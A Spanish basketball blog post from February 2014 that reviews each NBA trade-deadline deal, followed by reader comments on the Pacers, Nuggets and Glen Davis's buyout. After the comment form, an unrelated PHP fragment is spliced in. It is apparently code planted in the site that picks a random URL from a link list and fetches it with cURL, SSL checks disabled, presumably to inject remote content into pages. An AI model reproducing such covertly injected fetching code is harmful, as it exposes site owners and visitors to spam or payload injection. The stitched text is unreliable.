Resumen del trade deadline 2014: Larry Bird at the buzzer!

20 de February de 2014 por MagicJohnson32

El reloj marcó las 21:00, el trade deadline 2014 llegó y ni Pau Gasol, ni Rajon Rondo, ni Kevin Love, ni Luol Deng habían cambiado de equipo. Los grandes nombres traspasados eran Andre Miller, nuevo suplente de John Wall, y Spencer Hawes, llegado a Cleveland para alimentar las esperanzas de los Cavs de alcanzar los Playoffs. Tan soso había resultado que nos moríamos de ganas por ver a Jordan Hill traspasado a los Nets o Shumpert a los Clippers. Pero no. Eran las nueve de la noche y nada cambiaba de cara a los candidatos al título.

evan turnerSin embargo, apenas pasados unos minutos de las 21:30, Adrian Wojnarowski anunció que Indiana Pacers se reforzaba con Evan Turner y Lavoy Allen. Larry Bird, en un (nuevo) golpe de genio, mandaba a Danny Granger a Philadelphia y ponía a sus Pacers en condiciones óptimas para asaltar el trono de LeBron y los Heat. Además, de paso, maquillaba el peor trade deadline que recordamos, y es que, como consecuencia de las condiciones impuestas por el convenio vigente, la amplísima mayoría de movimientos se han debido a razones estrictamente económicas. También ha contribuido al conservadurismo de las franquicias la presunta excelencia del próximo draft. La cuestión es que, al margen del traspaso de Turner, la principal noticia, al menos desde el prisma que nos corresponde, es que Pau Gasol finalizará su contrato con los Lakers, que prefieren tratar de renovarlo a la baja o hacer un sign & trade este verano.

A continuación detallamos y valoramos todos los acuerdos que se han cerrado y los jugadores (y/o rondas de draft) que ha incorporado cada equipo involucrado:

Indiana Pacers: Evan Turner, Lavoy Allen
Philadelphia 76ers: Danny Granger, 2ª ronda 2015
Comentario: Genio Bird. Nos sorprendía que Turner siguiese en los Sixers, pero más aún nos ha sorprendido su destino, unos Pacers en los que ejercerá de sexto hombre, en un ambiente y una plantilla radicalmente diferentes a las que le acompañaban en Philadelphia. Lavoy Allen es poco más que un currante pero se ha mostrado como un suplente decente. Granger, por su parte, no es más que un expiring de 14 millones, una sombra del excelente alero que fue y viene a contribuir a uno de los ‘tanking modes’ más descarados que hemos visto.

L.A. Lakers: MarShon Brooks y Kent Bazemore
G.S. Warriors: Steve Blake
Comentario: Los Lakers reducen salarios y los Warriors logran el base suplente veterano que tanto necesitan, en especial un Stephen Curry del que abusan como creador de juego. Brooks y Bazemore, por su parte, llegan a L.A. como simples expirings, pero ambos deberían de tener oportunidades y minutos en lo que resta de temporada y podrían ganarse un contrato de cara al año próximo.

Washington Wizards: Andre Miller
Denver Nuggets: Jan Vesely
Philadelphia 76ers: Eric Maynor y dos 2as rondas
Comentario: Miller debe de estar celebrando su salida de Denver. Llevaba semanas castigado por Coach Shaw y va a un equipo que realmente necesitaba un jugador de su perfil. John Wall al fin tendrá un suplente en condiciones. El resto del traspaso es insustancial, aunque hay que destacar la habilidad de los Sixers para pescar dos elecciones del draft (una procedente de Wizards y la otra, de Nuggets).

Cleveland Cavaliers: Spencer Hawes
Philadelphia 76ers: Henry Sims, Earl Clark y dos 2as rondas
Comentario: Los Cavs se empeñan en entrar en Playoffs, y con esa idea se refuerzan con Hawes, que hará en Cleveland lo que hacía en Philadelphia (es decir, anotar desde media-larga distancia y no defender). Los 76ers siguen con su reconstrucción y acumulando elecciones en el draft. Clark y Sims son solo masa salarial para hacer posible el traspaso, aunque el primero debería de tener minutos.

Sacramento Kings: Jason Terry y Reggie Evans
Brooklyn Nets: Marcus Thornton
Comentario: Los Nets reciben pólvora (frecuentemente mojada) para su banquillo y los Kings se ahorran unos cuantos dólares tanto esta temporada como la próxima.

Charlotte Bobcats: Luke Ridnour y Gary Neal
Milwaukee Bucks: Ramon Sessions y Jeff Adrien
Comentario: No es exactamente el movimiento que esperaba Gary Neal, quien había expresado su deseo de ir a un ‘contender’, pero han estado bien los Bobcats con un traspaso que les consolida como claros candidatos a Playoffs. Sessions regresa a unos Bucks que, en fin, a quién le importan.

Miami Heat: 2a ronda (protegida)
Sacramento Kings: Roger Mason Jr.
Comentario: Los campeones abren un hueco en la plantilla en un movimiento que ya es un ‘Classic Riley’. De cara a Playoffs, los Heat firmarán un veterano, probablemente interior, y si no, tiempo al tiempo. Los Kings colaboran y, por ello, se ahorran algo de dinero.

Denver Nuggets: Aaron Brooks
Houston Rockets: Justin Hamilton
Comentario: Parecía que Hamilton acabaría en los Knicks a cambio de Udrih, pero finalmente el base suplente para Lawson será Aaron Brooks, que apenas contaba en Houston. Los Rockets incorporan a un jugador que encaja perfectamente en los esquemas de McHale.

San Antonio Spurs: Austin Daye
Toronto Raptors: Nando De Colo
Comentario: En Toronto deben de seguir gustando los jugadores europeos.

Atlanta Hawks: Antawn Jamison
L.A. Clippers: Derechos de Cenk Akyol (2ª ronda de 2005)
Comentario:
 Jamison llega a Atlanta a cambio de nada. Los Clippers se quitan de encima un salario que no aportaba nada y los Hawks suman un veterano a su maltrecho juego interior.

Philadelphia 76ers: BJ Mullens, 2ª ronda
L.A. Clippers: 2ª ronda (condicionada)
Comentario: Otra 2ª ronda que se sacan los Sixers de la chistera, esta vez asumiendo el contrato de Mullens, que viene a ser una copia barata de Hawes. Los Clippers se ahorran un kilito y liberan una plaza en el roster.

Comenta

25 comentarios a esta entrada

  1. Esteban dice:
    #1

    los Paceres se la juegan a todo este año, sin dudas no piensan en renovar a Turner de niguna manera, pero si utilizarlo lo mas posible este año a ver si los ayuda a ganar el titulo, total, Granger no estaba haciendo mucho y nunca termino de volver de su lesion

    sin dudas turner sera mas efectivo

    ahora, creo que a Granger lo podrian haber renovado por la excepcion (no se si la tendran entera los Pacers) y a Turner no, pero bueno q se le va a hacer

      Citar

  2. jhc dice:
    #2

    all-in de Pacers en toda regla!!

      Citar

  3. Sancho88 dice:
    #3

    Brooks a los Nuggets. Cómo les molan los bases enanos macho. Antes siempre tenían a Boykins, ahora Lawson, Robinson, y tras la lesión de Robinson, otro pequeñajo… Brooks. Como Lawson es más grandote que Thomas (lol), si fuera los Kings haría un Lawson por Thomas + Landry + Outlaw. Ese trade me encantaría para mis Kings, sería la hostia

      Citar

  4. MagicJohnson32 dice:
    #4

    Sancho88:
    Brooks a los Nuggets. Cómo les molan los bases enanos macho. Antes siempre tenían a Boykins, ahora Lawson, Robinson, y tras la lesión de Robinson, otro pequeñajo… Brooks. Como Lawson es más grandote que Thomas (lol), si fuera los Kings haría un Lawson por Thomas + Landry + Outlaw. Ese trade me encantaría para mis Kings, sería la hostia

    Dato curioso: En los últimos tres años, los Rockets han traspasado a Brooks dos veces en el trade deadline.

      Citar

  5. Simon dice:
    #5

    Excelente el movimiento de los Pacers! Como dice Esteban no creo que los Pacers estén interesados en renovar a Turner pero ojo! que además de servir para asaltar el anillo este año es que también les cubre las espaldas de cara a una posible marcha de Stephenson. Es decir si no pueden igualar las ofertas por Stephenson porque son demasiado altas a lo mejor se decantan por renovar a Turner a un precio más bajo.

      Citar

  6. Esteban dice:
    #6

    Simon:
    Excelente el movimiento de los Pacers! Como dice Esteban no creo que los Pacers estén interesados en renovar a Turner pero ojo! que además de servir para asaltar el anillo este año es quetambién les cubre las espaldas de cara a una posible marcha de Stephenson. Es decir si no pueden igualar las ofertas por Stephenson porque son demasiado altas a lo mejor se decantan por renovar a Turner a un precio más bajo.

    eso si que no lo creo, Turner ira por 10 millones al año mientras que Stephenson, seguramente por algo menos

    les guste a quien le guste, Turner encabezo en anotaciones a su equipo en muchisimos partidos, ha sido jugador, de rol, y estrella en su carrera

    lo de Stephenson habria que verlo, ha funcionado bien en el esquema de los Pacers, en su jkuego lento y ardua defensa, habria que ver que clase de escolta es en otro sistema

      Citar

  7. Sancho88 dice:
    #7

    Esteban, Stephenson es mil veces mejor jugador que Evan Turner. En todos los aspectos. A lo mejor no tiene el rango de tiro de Turner, pero en absolutamente todo lo demás es muy superior. Pero que muy superior

      Citar

  8. Sancho88 dice:
    #8

    Se hablaba de un interés de Portland por Camby, que al final no se ha hecho efectivo. Yo creo que si no lo fichan los Blazers, tiene mucha pinta de ir a parar a los Heat para intentar su último asalto al anillo y optar por la retirada. Si los Heat no le quieren, se retirará sin más. Sería una lástima irse sin anillo, claro, pero no todos pueden conseguirlo. Un jugador de leyenda Camby, un auténtico crack.

    Tendría sentido para Heat que han ganado los dos anillos con Juwan Howard de agitatoallas, incluso con Joel Anthony teniendo un papel muy testimonial. Ese papel lo podría cumplir este año Camby en playoffs, aunque está más complicado con Bosh, Haslem, Battier, Andersen y Oden. Sería buscarle un sitio como jugador número 12 o algo por el estilo. No sé si ahora es James Jones ese jugador.

    A mí me molan ese tipo de traspasos, de veteranérrimos, gente vieja de cojones, aprovechando sus últimos suspiros como profesionales en un equipo en las finales… da muchísima emoción pensar que quizá logre su premio, como lo lograron Casell y PJ Brown en los Celtics 2008, por ejemplo, el mismo Howard estos últimos dos años, etc. Me va a dar mucha pena ver a gente como Nash, Carter, McGrady el año pasado, y seguro que me estoy dejando gente en el tintero, irse a casa sin su anillo, pero así es la vida. Luego hay mascachapas como el fulano Dexter Pittman, que no sé si tiene uno o dos anillos con los Heat. Injusticias de la vida

      Citar

  9. Sancho88 dice:
    #9

    Noticia que le va a hacer feliz a Denise porque cumple su deseo. Parece ser que los Magic le han hecho el buyout a Glen Davis. En 48 horas cualquier equipo puede hacerse cargo de su contrato (que no creo) y si no es así, podrá firmar por el equipp que él decida (suponiendo que algún equipo quiere hacerle una oferta a este señor).

      Citar

  10. txusma dice:
    #10

    Sancho88:
    Noticia que le va a hacer feliz a Denise porque cumple su deseo. Parece ser que los Magic le han hecho el buyout a Glen Davis. En 48 horas cualquier equipo puede hacerse cargo de su contrato (que no creo) y si no es así, podrá firmar por el equipp que él decida(suponiendo que algún equipo quiere hacerle una oferta a este señor).

    Deben haberlo intentado a muerte pero ningún equipo de la liga ha querido asumir los 2 años de contratos a razón de unos 6’5 millones cada uno que tenía firmado.

      Citar

  11. Dantley dice:
    #11

    Qué asquerosamente flojo. Es lo que hay. Una parte de que aún las consecuencias del convenio no están interiorizadas y el miedo al draft, aunque menos.

    Bird gana, el resto miran.

    Por cierto, Clark ha sido cortado por Sixers. Será un refuerzo interesante para darle profundidad a alguna plantilla.

      Citar

  12. sempren dice:
    #12

    ¿No creéis que Vesely pueda tener alguna opción en los Nuggets? Quizá no sea un tipo atlético o especialmente fuerte como el resto de jugadores de la pintura de Denver, pero es un tipo diferente, y sabemos que es capaz de hacer de todo

      Citar

  13. rumbero dice:
    #13

    sempren:
    ¿No creéis que Vesely pueda tener alguna opción en los Nuggets? Quizá no sea un tipo atlético o especialmente fuerte como el resto de jugadores de la pintura de Denver, pero es un tipo diferente, y sabemos que es capaz de hacer de todo

    Tal y como están los Nuggets a día de hoy, con Shaw bastante perdido y variando rotaciones cada dos partidos, oportunidades debería tener. Veremos si las aprovecha, pero también creo que puede sacar la cabeza en la flojita pintura de Denver.

    Del resto pues nada, que el pájaro es un genio y que con las 8 o 9 segundas rondas que ya tienen los Sixers van a poder montar otro equipo

      Citar

  14. futurman dice:
    #14

    Bird no ha hecho tampoco un milagro ehhh, el contrato de Scola y sobretodo el de Copperland le van a pesar bastante, por que Indiana no es un equipo que vaya a rebasar el límite y luego tiene que renovar mucha gente…

    Además, no tienen picks, que vienen bien siempre para completar roster a bajo precio.

      Citar

  15. rumbero dice:
    #15

    futurman:
    Bird no ha hecho tampoco un milagro ehhh, el contrato de Scola y sobretodo el de Copperland le van a pesar bastante, por que Indiana no es un equipo que vaya a rebasar el límite y luego tiene que renovar mucha gente…

    Además, no tienen picks, que vienen bien siempre para completar roster a bajo precio.

    A Copeland lo apuntaremos como punto negativo sí, pero luego realmente sólo tienen que renovar a Stephenson, y como apunta Simón más arriba, juega la carta de Turner que en principio no debería hacerlo pero depende de como vaya el tema de Lance quién sabe. Para mí movimiento de crack y luego bajo la tesitura de que han hecho un all-in en toda regla por el anillo, cambiar a Granger (que venía sumando poco) por Turner+Allen y pillar a Bynum por 1 millón está más que bien y más viendo las cosas que hacen otros GM por otros lares

      Citar

  16. Esteban dice:
    #16

    futurman: zá no sea un tipo atlético o especialmente fuerte como el resto de jugadores de la pintura de Denver, pero es un tipo diferente, y sabemos que es capaz de hacer de todo

    el de Scola no tanto, las metidas de pata se las han mandado con Mahini y sus 4 millones y obviamente los 3 de coopeland

    pero ambos son expiring a fin de este año (al igual que scola) y quiza logren ubicaros en algun lugar sumando una ronda como hicieron con gerald green

      Citar

  17. Denise dice:
    #17

    Sancho88:
    Noticia que le va a hacer feliz a Denise porque cumple su deseo. Parece ser que los Magic le han hecho el buyout a Glen Davis. En 48 horas cualquier equipo puede hacerse cargo de su contrato (que no creo) y si no es así, podrá firmar por el equipp que él decida(suponiendo que algún equipo quiere hacerle una oferta a este señor).

    Bueno, buena noticia deportivamente ya que deja hueco y minutos a Nicholson, y también a Harkless, ya que Harris jugará más de 4.
    Económicamente no es buena noticia, porque pocos euros se ahorran, no? No sé muy bien como va esto del buy-out pero si alguien lo ficha por el 1 kilo, los Magic tienen que pagarle su salario menos 1 kilo, más todo el salario de la próxima , no?

    Cierto, que la temporada de Big Baby es muy floja, y en un equipo como los Magic en reconstrucción, no pintaba nada, pero ojo, que el que se lo lleve por el mínimo en el buy-out va a triunfar porque a ese precio es una ganga. Y si vuelve al nivel de hace 2 años, es un pedazo jugador.

      Citar

  18. Jose Luis dice:
    #18

    Denise, Glen Davis siempre ha sido un paquete con mucho kilo y algo de tiro de media. Bass era y es mucho mejor xD

      Citar

  19. Nacho dice:
    #19

    Croqueta man!!!! Si pagas un kilo, espectáculo en la cancha. Que vaya a los sixers, jejeje

      Citar

  20. Denise dice:
    #20

    Jose Luis:
    Denise, Glen Davis siempre ha sido un paquete con mucho kilo y algo de tiro de media. Bass era y es mucho mejor xD

    Acuéstate….xD,
    En serio, ¿el que fiche a Davis se hace cargo de su contrato la temporada que viene?

    Los Thunder deberían tirarse a saco por el gran Big Baby, y pasarían a ser para mí los favoritos en el Oeste.

      Citar

  21. Denise dice:
    #21

    Denise: Acuéstate….xD,
    En serio, ¿el que fiche a Davis se hace cargo de su contrato la temporada que viene?

    Los Thunder deberían tirarse a saco por el gran Big Baby, y pasarían a ser para mí los favoritos en el Oeste.

    Ó los Clippers. Si, sería genial que fuese a mi 2º equipo, los Clippers, allí con Barnes, Redick y otros jugadores que me gustan como Collison y Dudley. A por el anillo, Doc!!

      Citar

  22. Esteban dice:
    #22

    no, cuando se hace un buyout, el jugador resigna dinero y se queda en libertad de acción a cambio de una parte del contrato
    hoy davis puede fichar por el mínimo y el año que viene por lo que consiga, independientemente del contrato que tenia con orlando

    o al menos así lo tengo entendido yo

      Citar

  23. Ruxixon dice:
    #23

    Denise: Bueno, buena noticia deportivamente ya que deja hueco y minutos a Nicholson, y también a Harkless, ya que Harris jugará más de 4.
    Económicamente no es buena noticia, porque pocos euros se ahorran, no? No sé muy bien como va esto del buy-out pero si alguien lo ficha por el 1 kilo, los Magic tienen que pagarle su salario menos 1 kilo, más todo el salario de la próxima , no?

    Cierto, que la temporada de Big Baby es muy floja, y en un equipo como los Magic en reconstrucción, no pintaba nada, pero ojo, que el que se lo lleve por el mínimo en el buy-out va a triunfar porque a ese precio es una ganga. Y si vuelve al nivel de hace 2 años, es un pedazo jugador.

    Eso que comentas Denise sería en el caso de que se le hubiera aplicado una amnistía.En el caso de los buyout puedes negociar con el jugador el salario a convenir de lo que le que quedará por cobrar (p.e.si le quedan 12 millones por cobrar,acordar 7 que son los que realmente pagas) pero a efectos del CAP sigue contando el contrato firmado,es decir,el 6+6.Increible que no lo hayan traspasado recibiendo una miserable segunda ronda,eso dice mucho del poco cartel de Big Baby.Minutos para los jóvenes,yo en especial espero que le den cancha a O’Quinn que en la Summer League me pareció una mala bestia y me encantó.

      Citar

  24. Denise dice:
    #24

    Ruxixon: Eso que comentas Denise sería en el caso de que se le hubiera aplicado una amnistía.En el caso de los buyout puedes negociar con el jugador el salario a convenir de lo que le que quedará por cobrar (p.e.si le quedan 12 millones por cobrar,acordar 7 que son los que realmente pagas) pero a efectos del CAP sigue contando el contrato firmado,es decir,el 6+6.Increible que no lo hayan traspasado recibiendo una miserable segunda ronda,eso dice mucho del poco cartel de Big Baby.Minutos para los jóvenes,yo en especial espero que le den cancha a O’Quinn que en la Summer League me pareció una mala bestia y me encantó.

    Ok crack, yo lo he pillado. A ver si salen los términos del acuerdo.
    Pues tan malo no es para haber sido imposible traspasarlo, a mi me parece un buen jugador con un contrato elevado pero ni tóxico ni largo. Los Warriors por ejemplo necesitan más un Glen Davis que un Blake, ya nos podían haber ofrecido a Bazemore, Brooks y Speights ó el cadaver putrefacto de Jermaine O’Neal….
    A mi Kyle O’quinn me encanta, nunca será una estrella ni hará contratazos, pero es el típico jugador que siempre hay qu tener uno como él en la pintura para el trabajo sucio. Y a pesar de su apariencia, tan tosco no es en ataque, incluso creo que su visión de juego es muy elevada respecto a la media que tendrán los pivots, el tio a veces da unas pedazo de asistencias que no veas, sobre todo pases largos así tipo NFL.

      Citar

  25. Blade Petrovic dice:
    #25

    Denise: Ok crack, yo lo he pillado. A ver si salen los términos del acuerdo.
    el cadaver putrefacto de Jermaine O’Neal….

    Al parecer Jermaine te oyó, vaya partidazo se cascvó el crack,21 puntos y 13 rebotes ante los Nets, fue clave para obtener la victoria

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>